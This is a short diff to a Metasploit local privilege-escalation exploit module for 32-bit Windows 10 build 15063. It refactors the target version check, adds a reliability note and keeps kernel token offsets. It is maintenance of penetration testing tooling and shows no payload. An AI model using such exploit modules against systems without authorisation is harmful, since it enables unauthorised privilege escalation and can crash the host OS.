@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local
             'Windows 10 v1703 (Build 15063) x86', {
               'UniqueProcessIdOffset' => 180,
               'TokenOffset' => 252,
-              'Version' => 'Build 15063'
+              'Version' => Msf::WindowsVersion::Win10_1703
             }
           ]
         ],
@@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'Notes' => {
           'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
-          'Stability' => [CRASH_OS_RESTARTS]
+          'Stability' => [CRASH_OS_RESTARTS],
+          'Reliability' => UNKNOWN_RELIABILITY
         },
         'DisclosureDate' => '2018-10-09',
         'DefaultTarget' => 0,
@@ -74,7 +75,8 @@ class MetasploitModule < Msf::Exploit::Local
   def target_info
     fail_with(Failure::None, 'Session is already elevated') if is_system?
 
-    unless sysinfo['OS'].include?(target['Version']) && sysinfo['Architecture'] == 'x86'
+    version = get_version_info
+    unless version.build_number == target['Version'] && sysinfo['Architecture'] == 'x86'
       fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
     end
   end
